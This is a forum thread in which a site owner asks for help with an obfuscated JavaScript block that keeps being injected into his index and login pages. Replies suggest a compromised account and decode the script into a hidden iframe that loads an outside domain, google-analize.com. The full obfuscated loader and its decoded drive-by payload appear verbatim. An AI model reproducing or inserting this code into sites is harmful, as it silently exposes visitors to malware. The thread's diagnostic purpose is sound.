Jump to content

got a virus named Iframe.ph on my server

Jawed

By Jawed
in PHP Coding Help

 Share

Recommended Posts

Jawed Newbie

Jawed

Posted
Posted

Hi all,

 

I have a website running, it was fine few days back but now when a open the site it opens a blank page then i checed the code of the index page then i found that there is a javascript ebmedded in my code in all index pages and login pages, this javascirpt did open a blank page.

I dowloaded whole site, deleted the code form the server scanned the code with kerpersky antivirus and notorn antivirus , both did not showed any virus in the code then i manuallyu checked all index and login named pages and no malacious code was there then i uploaded the site again , but for my bad luck then virus again come in Iframe.ph and again the site is not opening due to the same javascript code??????

 

i am using dreamweaver cs3 and my site is hosted on netsol. The problem is all the files named as index and login are affected, all the codes in these files get lost and this javascript is embedded

 

<script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script>

 

I tried many things but none worked out, even i removed the write permission of index and login files but this too did not work.

 

Thanks in advance for any kind of help

 

 

 

Can anyone help me in this regard ?????

Link to comment
Share on other sites
tibberous Advanced Member

tibberous

Posted
Posted

Are you sure the virus is part of the files on your server? Maybe your computer got a virus or your account info got stolen, and a remote script is logging in as you and changing the files.

 

I'd backup your files, reformat, change your password, then go over your site code and try to find the virus. If you are using a big CMS with too much code to wade through, just download the newest version and move your data over. Also, contact netsol and have them make sure you don't have any processes or bad crontabs set to run.

Link to comment
Share on other sites
btherl Member

btherl

Posted
Posted

Here's your virus decoded.  1st step:

 

<script>function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content();

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%78%75%3d%31&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%31%35%32%37%29%2b%27%65%38%61%38%32%39%65%37%64%66%64%27%20%77%69%64%74%68%3d%35%36%33%20%68%65%69%67%68%74%3d%34%32%39%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

 

2nd step (results of unescape()):

 

<iframe name=c4 src='http://google-analize.com/in.cgi?15&xu=1&'+Math.round(Math.random()*241527)+'e8a829e7dfd' width=563 height=429 style='display: none'></iframe>

 

If the code keeps coming back then something is placing it there.  I think Tibberous gave good advice there.

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.